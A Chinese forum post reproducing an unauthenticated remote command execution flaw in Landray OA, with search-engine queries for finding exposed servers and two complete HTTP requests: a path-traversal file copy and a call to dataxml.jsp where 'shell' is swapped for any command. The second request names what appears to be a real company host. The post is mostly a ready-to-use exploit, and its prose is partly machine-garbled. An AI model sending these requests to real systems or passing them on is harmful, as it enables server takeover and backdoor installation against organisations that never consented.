【漏洞复现】蓝凌OA——远程下令实行

打印 上一主题 下一主题

主题 1006|帖子 1006|积分 3018

声明:本文档或演示材料仅供辅导和教学目的使用,任何个人或构造使用本文档中的信息举行非法活动,均与本文档的作者或发布者无关。
  
  

漏洞形貌

蓝凌OA平台,数字化向纵深发展,正加快构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台可以或许支持办公数字化、管理智能化、应用平台化、构造生态化,赋能大中型构造的内外协作与管理,支持商业模式创新与转型发展。由于蓝凌OA代码功能模块设计缺陷题目,攻击者可以利用文件复制的方式,将背景脚本功能模块文件复制到无需权限认证的目次下,导致未经过身份认证的攻击者利用背景脚本实行模块,远程下令实行,写入后门文件并获取服务器权限。
漏洞复现

1)信息网络
fofa:app="Landray-OA系统"
hunter:app.name="Landray 蓝凌OA"

我们永远无法叫醒一个装睡的人 。

2)构造数据包
  1. POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
  2. Host: ip
  3. Accept:application/json,text/javascript,*/*;q=0.01
  4. Accept-Encoding:gzip,deflate
  5. Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
  6. Connection:close
  7. Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
  8. User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36
  9. X-Requested-With:XMLHttpRequest
  10. Content-Length: 395
  11. ------WebKitFormBoundaryL7ILSpOdIhIIvL51
  12. Content-Disposition:form-data;name="method"
  13. replaceExtend
  14. ------WebKitFormBoundaryL7ILSpOdIhIIvL51
  15. Content-Disposition:form-data;name="extendId"
  16. ../../../../resource/help/km/review/
  17. ------WebKitFormBoundaryL7ILSpOdIhIIvL51
  18. Content-Disposition:form-data;name="folderName"
  19. ../../../ekp/sys/common
  20. ------WebKitFormBoundaryL7ILSpOdIhIIvL51--
复制代码

  1. POST /resource/help/km/review/dataxml.jsp HTTP/1.1
  2. Host: cfoa.cfpharmtech.com:9081
  3. User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/113.0.0.0Safari/537.36
  4. Connection:close
  5. Content-Length:17392
  6. Content-Type:application/x-www-form-urlencoded
  7. s_bean=ruleFormulaValidate&script=shell&returnType=int&modelName=test
复制代码

将shell更换成下令即可

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

我可以不吃啊

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表